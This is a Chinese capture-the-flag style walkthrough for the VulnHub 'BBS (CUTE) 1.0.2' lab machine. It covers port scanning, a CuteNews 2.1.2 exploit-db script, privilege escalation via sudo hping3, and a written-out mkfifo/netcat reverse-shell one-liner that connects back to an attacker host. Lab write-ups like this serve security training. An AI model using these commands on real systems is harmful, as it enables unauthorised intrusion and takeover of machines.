BBS (CUTE): 1.0.2靶机渗透
字数 1013 2025-08-15 21:33:57
BBS (CUTE): 1.0.2靶机渗透教学文档
靶机基础信息
- 名称: BBS (公告板系统)
- 版本: 1.0.2
- 难度: 简单->中级
- 发布日期: 2020/9/24
- 目标: 获取root权限
- 描述: 包含一种非常罕见的最终利用技术
- 下载链接: https://www.vulnhub.com/entry/bbs-cute-102,567/
环境准备
- 攻击机: Kali Linux
- 靶机运行环境: VM VirtualBox
- 网络模式: Host-only (确保攻击机和靶机在同一网络)
渗透测试流程
一、信息收集阶段
-
IP地址发现
nmap 192.168.56.0/24- 发现靶机IP: 192.168.56.108
-
端口与服务扫描
nmap -sV -p- -O -A 192.168.56.108- 扫描结果:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 88/tcp open http nginx 1.14.2 110/tcp open pop3 Courier pop3d 995/tcp open ssl/pop3 Courier pop3d
- 扫描结果:
-
Web应用信息收集
- 访问http://192.168.56.108显示Apache默认页面
- 使用dirb进行目录扫描:
dirb http://192.168.56.108 - 发现登录页面: http://192.168.56.108/
二、漏洞探测与利用
-
识别Web应用
- 确定为CuteNews 2.1.2版本
- 搜索已知漏洞:
searchsploit CuteNews 2.1.2 - 发现可利用脚本: 48800.py
-
准备利用脚本
cp /usr/share/exploitdb/exploits/php/webapps/48800.py /root- 注意: 脚本中的"CuteNews"字符串需要删除才能正常运行
-
执行漏洞利用
python3 ./48800.py- 获取临时权限
-
建立反弹shell
- 在攻击机启动监听:
nc -lvnp 1234 - 在靶机执行:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234 >/tmp/f
- 在攻击机启动监听:
三、权限提升
-
升级shell
python -c "import pty;pty.spawn('/bin/bash')" -
检查sudo权限
sudo -l- 发现可执行命令:
/usr/sbin/hping3 --icmp
- 发现可执行命令:
-
利用hping3提权
- 研究hping3命令使用方式
- 执行提权命令:
sudo /usr/sbin/hping3 --icmp - 成功获取root权限
-
查看flag
- 定位并查看flag文件
关键知识点总结
-
信息收集技巧
- 使用nmap进行网络扫描和端口服务识别
- 使用dirb进行Web目录爆破
-
漏洞利用要点
- 准确识别应用版本
- 正确修改利用脚本以适应环境
- 建立稳定的反弹shell连接
-
权限提升方法
- 检查sudo -l显示的可执行命令
- 研究不常见命令(hping3)的提权方法
- 利用特殊参数执行特权操作
-
渗透测试思维
- 从信息收集到漏洞利用的系统性思维
- 遇到不熟悉命令时的研究能力(Google搜索)
- 权限维持和升级的技巧
参考资源
- hping3使用指南: https://www.cnblogs.com/zlgxzswjy/p/14115306.html
- CuteNews漏洞利用脚本: /usr/share/exploitdb/exploits/php/webapps/48800.py